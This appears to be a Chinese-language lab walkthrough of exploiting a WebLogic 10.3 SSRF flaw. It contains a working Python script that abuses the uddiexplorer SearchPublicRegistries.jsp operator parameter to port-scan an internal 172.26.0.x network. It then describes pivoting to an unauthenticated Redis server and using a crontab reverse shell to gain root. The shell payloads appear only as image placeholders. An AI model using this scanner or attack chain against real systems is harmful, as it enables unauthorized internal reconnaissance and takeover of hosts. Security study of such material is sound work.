漏洞环境
Weblogic 10.3版本
内网ip网段:172.26.0.0/24
ssrf 漏洞验证
此处可以利用有回显和无回显漏洞验证
image.png
漏洞利用:
- 内网探测
此处编写python脚本自动化扫描
import thread
import time
import re
import requests
def ite_ip(ip):
for i in range(1, 256):
final_ip = '{ip}.{i}'.format(ip=ip, i=i)
print final_ip
thread.start_new_thread(scan, (final_ip,))
time.sleep(3)
def scan(final_ip):
ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')
for port in ports:
vul_url = 'http://192.168.124.7:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)
try:
#print vul_url
r = requests.get(vul_url, timeout=15, verify=False)
result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)
result2 = re.findall('but could not connect', r.content)
result3 = re.findall('No route to host', r.content)
if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
print '[!]'+final_ip + ':' + port
except Exception, e:
pass
if __name__ == '__main__':
ip = "172.26.0"
if ip:
print ip
ite_ip(ip)
else:
print "no ip"
经探测内网存在redis数据库服务6379开放
image.png
redis 未授权
-
crontab计划任务反弹shell
image.png
image.png
image.png
至此,通过外网weblogic ssrf漏洞拿到内网redis数据库主机root权限。
